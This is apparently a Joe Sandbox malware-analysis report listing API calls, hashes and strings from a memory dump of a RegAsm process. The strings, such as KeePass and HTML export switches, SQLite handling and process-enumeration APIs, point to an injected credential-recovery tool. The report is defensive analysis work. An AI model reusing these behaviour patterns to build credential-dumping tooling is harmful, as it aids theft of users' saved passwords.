                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$DeleteHandleImageLoadModuleObjectmemset$ColorDirectoryFileInfoWindows
                                                          • String ID:
                                                          • API String ID: 1010922700-0
                                                          • Opcode ID: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                          • Instruction ID: e9b684d61d60cc1afb152275eb3c8de820581b68aaecd99ee02cab8be193ddee
                                                          • Opcode Fuzzy Hash: 9f32c972fd3bed260489b92fc8884ca82be835491797332215144efe3993187c
                                                          • Instruction Fuzzy Hash: 48418575640304BFF720AF61DC8AF97779CFB09744F000829F399A51E1D6F6A8909B29
                                                          APIs
                                                            • Part of subcall function 0041739B: GetVersionExW.KERNEL32(?), ref: 004173BE
                                                          • GetFullPathNameW.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186AC
                                                          • malloc.MSVCRT ref: 004186B7
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004186C7
                                                          • GetFullPathNameW.KERNEL32(00000000,-00000003,00000000,00000000), ref: 004186DB
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 004186E0
                                                          • GetFullPathNameA.KERNEL32(00000000,00000000,00000000,00000000,00000000,?,00000000,00000000,?,00000000), ref: 004186F6
                                                          • malloc.MSVCRT ref: 004186FE
                                                          • GetFullPathNameA.KERNEL32(00000000,-00000003,00000000,00000000), ref: 00418711
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418716
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 0041872A
                                                          • ??3@YAXPAX@Z.MSVCRT ref: 00418749
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??3@$FullNamePath$malloc$Version
                                                          • String ID: |A
                                                          • API String ID: 4233704886-1717621600
                                                          • Opcode ID: 7e01f0dee03851588a79a4a26fa611e8dffd0452dbc09a85c2cc2e741f239264
                                                          • Instruction ID: f8a1ad7f3386c3a0ca67e8408a701755caa4d882ef8d2f884b3bc60851bd4b4d
                                                          • Opcode Fuzzy Hash: 7e01f0dee03851588a79a4a26fa611e8dffd0452dbc09a85c2cc2e741f239264
                                                          • Instruction Fuzzy Hash: F5217432900118BFEF11BFA6DC46CDFBB79DF41368B22006FF804A2161DA799E91995D
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: _wcsicmp
                                                          • String ID: /scomma$/shtml$/skeepass$/stab$/stabular$/sverhtml$/sxml
                                                          • API String ID: 2081463915-1959339147
                                                          • Opcode ID: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                          • Instruction ID: 8733bd8b557f913067c5021fbfe18d0583d9fd94efe92a6f612d034962822ca0
                                                          • Opcode Fuzzy Hash: 28c2ebe8ae336333f434d0f7201133c37a7c95e7bcc6e3a748ef2c38aa05b661
                                                          • Instruction Fuzzy Hash: A401843328931228FA2538663D07F834F48CB52BBBF32405BF800D81C6FE8C4565605E
                                                          APIs
                                                          • GetDC.USER32(00000000), ref: 004121FF
                                                          • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0041220A
                                                          • ReleaseDC.USER32(00000000,00000000), ref: 0041221F
                                                          • SetBkMode.GDI32(?,00000001), ref: 00412232
                                                          • SetTextColor.GDI32(?,00FF0000), ref: 00412240
                                                          • SelectObject.GDI32(?,?), ref: 00412251
                                                          • DrawTextExW.USER32(?,?,000000FF,?,00000024,?), ref: 00412285
                                                          • SelectObject.GDI32(00000014,00000005), ref: 00412291
                                                            • Part of subcall function 00411FC6: GetCursorPos.USER32(?), ref: 00411FD0
                                                            • Part of subcall function 00411FC6: GetSubMenu.USER32(?,00000000), ref: 00411FDE
                                                            • Part of subcall function 00411FC6: TrackPopupMenu.USER32(00000000,00000002,?,?,00000000,?,00000000), ref: 0041200F
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 004122AC
                                                          • LoadCursorW.USER32(00000000,00000067), ref: 004122B5
                                                          • SetCursor.USER32(00000000), ref: 004122BC
                                                          • PostMessageW.USER32(?,00000428,00000000,00000000), ref: 00412304
                                                          • memcpy.MSVCRT ref: 0041234D
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Cursor$MenuObjectSelectText$CapsColorDeviceDrawHandleLoadMessageModeModulePopupPostReleaseTrackmemcpy
                                                          • String ID:
                                                          • API String ID: 1700100422-0
                                                          • Opcode ID: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                          • Instruction ID: eb413d4c014922f01c1be241ee45634b3e5b5e29cfe5fc1015c733cb557b7a75
                                                          • Opcode Fuzzy Hash: da24f667188ca395770274d48ae20aaa805e07b53c3ccbe50e1108a3d75e9f91
                                                          • Instruction Fuzzy Hash: 0F61D331600109AFDB149F74CE89BEA77A5BB45300F10052AFA25D7291DBBC9CB1DB59
                                                          APIs
                                                          • GetClientRect.USER32(?,?), ref: 004111E0
                                                          • GetWindowRect.USER32(?,?), ref: 004111F6
                                                          • GetWindowRect.USER32(?,?), ref: 0041120C
                                                          • GetDlgItem.USER32(00000000,0000040D), ref: 00411246
                                                          • GetWindowRect.USER32(00000000), ref: 0041124D
                                                          • MapWindowPoints.USER32(00000000,00000000,?,00000002), ref: 0041125D
                                                          • BeginDeferWindowPos.USER32(00000004), ref: 00411281
                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,00000000,?,?,00000004), ref: 004112A4
                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,?,?,?,00000006), ref: 004112C3
                                                          • DeferWindowPos.USER32(?,?,00000000,00000000,000000DC,?,?,00000004), ref: 004112EE
                                                          • DeferWindowPos.USER32(?,00000000,00000000,00000000,?,?,000000DC,00000004), ref: 00411306
                                                          • EndDeferWindowPos.USER32(?), ref: 0041130B
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Window$Defer$Rect$BeginClientItemPoints
                                                          • String ID:
                                                          • API String ID: 552707033-0
                                                          • Opcode ID: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                          • Instruction ID: 1a89c9de14f4e003cb1acc22e2fe5cfe68aec74c13575a54a2aa846d798aa5ff
                                                          • Opcode Fuzzy Hash: 94434f3586c80254c14fe7888e5e60b5c724479e0532bb2ef8c61210f3daf4e7
                                                          • Instruction Fuzzy Hash: 3B41D375900209FFEB11DFA8DD89FEEBBBAFB48300F104469F655A61A0C771AA50DB14
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$_snwprintf
                                                          • String ID: %%0.%df
                                                          • API String ID: 3473751417-763548558
                                                          • Opcode ID: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                          • Instruction ID: e3e507119e413e1699737691dcc770ce903c50d69a4f0c7cc4f670013a5326e5
                                                          • Opcode Fuzzy Hash: d3ed19b3c5d3f5d27fcb945595af099acb5609e53fc24cbfd77fa4eb0abb8f2a
                                                          • Instruction Fuzzy Hash: 2D318F71800129BBEB20DF95CC85FEB77BCFF49304F0104EAB509A2155E7349A94CBA9
                                                          APIs
                                                          • SetTimer.USER32(?,00000041,00000064,00000000), ref: 004060C7
                                                          • KillTimer.USER32(?,00000041), ref: 004060D7
                                                          • KillTimer.USER32(?,00000041), ref: 004060E8
                                                          • GetTickCount.KERNEL32 ref: 0040610B
                                                          • GetParent.USER32(?), ref: 00406136
                                                          • SendMessageW.USER32(00000000), ref: 0040613D
                                                          • BeginDeferWindowPos.USER32(00000004), ref: 0040614B
                                                          • EndDeferWindowPos.USER32(00000000), ref: 0040619B
                                                          • InvalidateRect.USER32(?,?,00000001), ref: 004061A7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Timer$DeferKillWindow$BeginCountInvalidateMessageParentRectSendTick
                                                          • String ID: A
                                                          • API String ID: 2892645895-3554254475
                                                          • Opcode ID: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                          • Instruction ID: 3d646c34c65c30a23a549f03b0efc12359fcfb722ff8df3f2fd47db5f06942f8
                                                          • Opcode Fuzzy Hash: 9ab18b63844edbdd48863c33bac36f0a113902732bc81a80893c7cf372b99e85
                                                          • Instruction Fuzzy Hash: 67318F75240304BBEB205F62DC85F6A7B6ABB44742F018539F3067A5E1C7F998A18B58
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(ntdll.dll,-00000108,0040DE02,?,000000FF,00000000,00000104), ref: 00413542
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID: NtLoadDriver$NtOpenSymbolicLinkObject$NtQueryObject$NtQuerySymbolicLinkObject$NtQuerySystemInformation$NtResumeProcess$NtSuspendProcess$NtUnloadDriver$ntdll.dll
                                                          • API String ID: 4139908857-2887671607
                                                          • Opcode ID: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                          • Instruction ID: 8dd6b0f06cc06780b82abcfa5335c49c30c65db347d43124f897848efd9f6b7c
                                                          • Opcode Fuzzy Hash: 57b3ef5f97466978e1990f74adf29af07ff290b7ce4571feabf87054e0031f76
                                                          • Instruction Fuzzy Hash: 8C015E75D48324AACB339F75AD09A053FB1EF04797B1004B7A80492266DAF9815CDE4C
                                                          APIs
                                                            • Part of subcall function 0040A32D: SetFilePointer.KERNEL32(0040C2BF,?,00000000,00000000,?,0040C0C5,00000000,00000000,?,00000020,?,0040C255,?,?,*.*,0040C2BF), ref: 0040A33A
                                                          • GetFileSize.KERNEL32(00000000,00000000), ref: 0040C0D4
                                                            • Part of subcall function 0040BFF3: _memicmp.MSVCRT ref: 0040C00D
                                                            • Part of subcall function 0040BFF3: memcpy.MSVCRT ref: 0040C024
                                                          • memcpy.MSVCRT ref: 0040C11B
                                                          • strchr.MSVCRT ref: 0040C140
                                                          • strchr.MSVCRT ref: 0040C151
                                                          • _strlwr.MSVCRT ref: 0040C15F
                                                          • memset.MSVCRT ref: 0040C17A
                                                          • CloseHandle.KERNEL32(00000000), ref: 0040C1C7
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Filememcpystrchr$CloseHandlePointerSize_memicmp_strlwrmemset
                                                          • String ID: 4$h
                                                          • API String ID: 4019544885-1856150674
                                                          • Opcode ID: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                          • Instruction ID: ad7b68c589633d756b108d453181f98220e50dbf4ed18f1a1dc8c2c6e1bbf79d
                                                          • Opcode Fuzzy Hash: 74984e11edfdd2211d0d35a95e6cfe2b897958e94349246af9e5f94d48ef065d
                                                          • Instruction Fuzzy Hash: F531C2B2800218FEEB20EB54CC85EEE73BCEF05354F14416AF508A6181D7389F558FA9
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Menu$Itemmemset$CountInfoModifywcscatwcschr
                                                          • String ID: 0$6
                                                          • API String ID: 4066108131-3849865405
                                                          • Opcode ID: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                          • Instruction ID: 23fd2219eb4cf2a86962fa47610fb6a66e7712bfbd77636794901fa2ff6d3352
                                                          • Opcode Fuzzy Hash: 0289309123c9ab86839131df51d1afc7e9f627d47cda6d3754f054bafba8353e
                                                          • Instruction Fuzzy Hash: 1C317C72808344AFDB209F95D84499FB7E8FF84314F00493EFA48A2291D775D949CB5B
                                                          APIs
                                                          • memset.MSVCRT ref: 004082EF
                                                            • Part of subcall function 0040A6E6: WideCharToMultiByte.KERNEL32(0000FDE9,00000000,000003FF,000000FF,00000000,000003FF,00000000,00000000,0040B866,00445FAE,?,?,?,?,?,?), ref: 0040A6FF
                                                          • memset.MSVCRT ref: 00408362
                                                          • memset.MSVCRT ref: 00408377
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memset$ByteCharMultiWide
                                                          • String ID:
                                                          • API String ID: 290601579-0
                                                          • Opcode ID: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                                                          • Instruction ID: eff1c4cb9ad8ed09cf65616da307521f953f8cb6273bc8e87bbfe44e88666a06
                                                          • Opcode Fuzzy Hash: 2c5b7af1b6ad7fa84976a25c4c1a6b62738b238711a472a87ec5ace72f6ab842
                                                          • Instruction Fuzzy Hash: E1716C72E0421DAFEF10EFA1EC82AEDB7B9EF04314F14406FE104B6191EB795A458B59
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpywcslen$_snwprintfmemset
                                                          • String ID: %s (%s)$YV@
                                                          • API String ID: 3979103747-598926743
                                                          • Opcode ID: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                          • Instruction ID: 06bfc13611ed198a4270a5cd43788582667178ba612a9453d6f3368808cd6753
                                                          • Opcode Fuzzy Hash: 2040f1418fb7f55927111411806f4302e3b16a8f1d7874ce907b9bb2b5999412
                                                          • Instruction Fuzzy Hash: 31216F72900219BBDF21DF55CC45D8BB7B8BF04318F018466E948AB106DB74EA188BD9
                                                          APIs
                                                          • LoadLibraryExW.KERNEL32(netmsg.dll,00000000,00000002,?,?,?,?,00409764,?), ref: 0040A686
                                                          • FormatMessageW.KERNEL32(00001100,00000000,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6A4
                                                          • wcslen.MSVCRT ref: 0040A6B1
                                                          • wcscpy.MSVCRT ref: 0040A6C1
                                                          • LocalFree.KERNEL32(?,?,00000400,?,00000000,00000000,?,?,?,?,00409764,?), ref: 0040A6CB
                                                          • wcscpy.MSVCRT ref: 0040A6DB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: wcscpy$FormatFreeLibraryLoadLocalMessagewcslen
                                                          • String ID: Unknown Error$netmsg.dll
                                                          • API String ID: 2767993716-572158859
                                                          • Opcode ID: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                          • Instruction ID: f30f617898fcbe25dfcd40b25f3134c3ee1324ef56ff669fd92f7ad18b117fee
                                                          • Opcode Fuzzy Hash: 6af7a682c2b6d94d5c313714e0e524a7557e97864fcb7fd89b068039d1905f7d
                                                          • Instruction Fuzzy Hash: 77014772104214BFE7151B61EC46E9F7B3DEF06795F24043AF902B10D0DA7A5E10D69D
                                                          APIs
                                                          Strings
                                                          • unable to open database: %s, xrefs: 0042F84E
                                                          • database %s is already in use, xrefs: 0042F6C5
                                                          • attached databases must use the same text encoding as main database, xrefs: 0042F76F
                                                          • too many attached databases - max %d, xrefs: 0042F64D
                                                          • database is already attached, xrefs: 0042F721
                                                          • cannot ATTACH database within transaction, xrefs: 0042F663
                                                          • out of memory, xrefs: 0042F865
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpymemset
                                                          • String ID: attached databases must use the same text encoding as main database$cannot ATTACH database within transaction$database %s is already in use$database is already attached$out of memory$too many attached databases - max %d$unable to open database: %s
                                                          • API String ID: 1297977491-2001300268
                                                          • Opcode ID: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                          • Instruction ID: 2d624c67d108d3170f37657fe85980b6deaf3b4166a4b31ce602698a835437d0
                                                          • Opcode Fuzzy Hash: fafdf879e702536ae0a8da4e3c7de2ba30e48f0de6d41113ccb8534cd7e7e00e
                                                          • Instruction Fuzzy Hash: 4791C131B00315AFDB10DF65E481B9ABBB0AF44318F94807FE8059B252D778E949CB59
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(00000000,?,?,00402E6F), ref: 0040D173
                                                          • wcscpy.MSVCRT ref: 0040D1B5
                                                            • Part of subcall function 0040D626: memset.MSVCRT ref: 0040D639
                                                            • Part of subcall function 0040D626: _itow.MSVCRT ref: 0040D647
                                                          • wcslen.MSVCRT ref: 0040D1D3
                                                          • GetModuleHandleW.KERNEL32(00000000), ref: 0040D1E1
                                                          • LoadStringW.USER32(00000000,?,?), ref: 0040D20C
                                                          • memcpy.MSVCRT ref: 0040D24C
                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0CC
                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D0EA
                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D108
                                                            • Part of subcall function 0040D092: ??2@YAPAXI@Z.MSVCRT ref: 0040D126
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ??2@$HandleModule$LoadString_itowmemcpymemsetwcscpywcslen
                                                          • String ID: strings
                                                          • API String ID: 3166385802-3030018805
                                                          • Opcode ID: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                          • Instruction ID: f4589d763452722e7ce024d248fd6f149fceb83749f413ad0df853fa0cd60d20
                                                          • Opcode Fuzzy Hash: 1ff794482afb279d074c0027ae841dfa169eb318e5c6685fac8801d3cb652815
                                                          • Instruction Fuzzy Hash: 78418D75D003109BD7369FA8ED809263365FF48306700047EE942972A7DEB9E886CB5D
                                                          APIs
                                                          • LoadLibraryW.KERNEL32(comctl32.dll), ref: 004044C3
                                                          • FreeLibrary.KERNEL32(00000000), ref: 004044E9
                                                          • MessageBoxW.USER32(00000001,Error: Cannot load the common control classes.,Error,00000030), ref: 00404514
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Library$FreeLoadMessage
                                                          • String ID: Error$Error: Cannot load the common control classes.$InitCommonControlsEx$comctl32.dll
                                                          • API String ID: 3897320386-317687271
                                                          • Opcode ID: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                          • Instruction ID: 703d86131c3dcb59aab6256491fb2853d543806c906e0642a055f98632e98cc8
                                                          • Opcode Fuzzy Hash: 4451af1fa5a3c13e403cd0bd9a94ec580510088b32cd85f0031bb893d40152de
                                                          • Instruction Fuzzy Hash: B201D6757502217BE7112FB69C49F7B7A9CFF82749B000035E601E2180EAB8D901926D
                                                          APIs
                                                            • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                            • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                            • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                            • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(00000000), ref: 0040A87B
                                                            • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?), ref: 0040A884
                                                          • FreeLibrary.KERNEL32(00000000), ref: 00413951
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: Library$Load$DirectoryFreeSystemmemsetwcscatwcscpy
                                                          • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                          • API String ID: 4271163124-70141382
                                                          • Opcode ID: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                                                          • Instruction ID: 1ed0e205fb1d3ca6b4a3c81c58fecbd4dea9624ac3f9f6029147382c5f000437
                                                          • Opcode Fuzzy Hash: 041abbf71437061a0f134c3fe1786c70626f7864bc8708fd51d9cd322498a069
                                                          • Instruction Fuzzy Hash: 7301B5B1905312DAD7705F31AE40B6B2FA45B81FA7B10003BEA00D1286DBFCC8C5DA6E
                                                          APIs
                                                          • GetModuleHandleW.KERNEL32(kernel32.dll,?,0041339D), ref: 0041384C
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: HandleModule
                                                          • String ID: CreateToolhelp32Snapshot$Module32First$Module32Next$Process32First$Process32Next$kernel32.dll
                                                          • API String ID: 4139908857-3953557276
                                                          • Opcode ID: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                          • Instruction ID: ced2a49a11d8a5ad7e856d80fa96ce31c371be68fc2c17877008b9264e9f9212
                                                          • Opcode Fuzzy Hash: 31f1d1be7c9a4426e09052d790ecb19dd0b8106983b19d46a1984a4086cae070
                                                          • Instruction Fuzzy Hash: 58F08631900317A9E7206F357D41B672AE45B86F83714017BFC04D12D9DB7CE98A9B6D
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpy$memset
                                                          • String ID: -journal$-wal
                                                          • API String ID: 438689982-2894717839
                                                          • Opcode ID: a23b5b0b71c70c88a774746b26d285d432c8b869e41e999d2c4a765dbb53c531
                                                          • Instruction ID: 9370885b9bf0560d7aa4477d28ce4586d78acc2621466e64c0ac2b95c9c5353a
                                                          • Opcode Fuzzy Hash: a23b5b0b71c70c88a774746b26d285d432c8b869e41e999d2c4a765dbb53c531
                                                          • Instruction Fuzzy Hash: CBA1EFB1A04606EFCB14DF69C8417DAFBB4FF04314F14826EE46897381D738AA95CB99
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpy$CountCounterCurrentPerformanceProcessQuerySystemTickTime
                                                          • String ID:
                                                          • API String ID: 4218492932-0
                                                          • Opcode ID: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                          • Instruction ID: a427a134a5f43ecd7f569dc5a6dbdc76404a49e7a1b6a3986382666b5299f542
                                                          • Opcode Fuzzy Hash: 5b3bc6f1ade46934c27ca3d947f7b8c79a38ab90bf8452c3a07df30f33fc823a
                                                          • Instruction Fuzzy Hash: 141184B39001286BEB00AFA5DC899DEB7ACEB1A210F454837FA15D7144E634E2488795
                                                          APIs
                                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6EB
                                                            • Part of subcall function 0044A6E0: memset.MSVCRT ref: 0044A6FB
                                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A75D
                                                            • Part of subcall function 0044A6E0: memcpy.MSVCRT ref: 0044A7AA
                                                          • memcpy.MSVCRT ref: 0044A8BF
                                                          • memcpy.MSVCRT ref: 0044A90C
                                                          • memcpy.MSVCRT ref: 0044A988
                                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A422
                                                            • Part of subcall function 0044A3F0: memcpy.MSVCRT ref: 0044A46E
                                                          • memcpy.MSVCRT ref: 0044A9D8
                                                          • memcpy.MSVCRT ref: 0044AA19
                                                          • memcpy.MSVCRT ref: 0044AA4A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: memcpy$memset
                                                          • String ID: gj
                                                          • API String ID: 438689982-4203073231
                                                          • Opcode ID: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                          • Instruction ID: 6893d0ddfb5a5ce8f484e87047b84ef7868cce638272d7e844f470f6f9013d76
                                                          • Opcode Fuzzy Hash: 85f25b7c526aeaf15c340c15a86b7b9b8fd097bc53de23dcb8424ba1f871f8ae
                                                          • Instruction Fuzzy Hash: 2E71D6F39083449BE310EF25D84059FB7E9ABD5348F050E2EF88997205E639DA19C797
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_12_2_400000_RegAsm.jbxd
                                                          Similarity
                                                          • API ID: ItemMenu$CountInfomemsetwcschr
                                                          • String ID: 0$6
                                                          • API String ID: 2029023288-3849865405
                                                          • Opcode ID: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                          • Instruction ID: 35075b9e4b0179943f9cc9fcb0392e174ec026107191ec1d659f896637aaeb19
                                                          • Opcode Fuzzy Hash: 391c38dbba120c466a74104014748036d1901581f04e0d37adf97963ab497765
                                                          • Instruction Fuzzy Hash: A321AB32905300ABD720AF91DC8599FB7B8FB85754F000A3FF954A2280E779D944CB9A
                                                          APIs
                                                            • Part of subcall function 004055A4: GetLastError.KERNEL32(?,00000000,00405522,?,?,?,00000000,00000000,?,00408E1C,?,?,00000060,00000000), ref: 004055B9
                                                          • memset.MSVCRT ref: 00405455
                                                          • memset.MSVCRT ref: 0040546C
                                                          • memset.MSVCRT ref: 00405483
                                                          • memcpy.MSVCRT ref: 00405498
                                                          • memcpy.MSVCRT ref: 004054AD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 0000000C.00000002.423481578.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
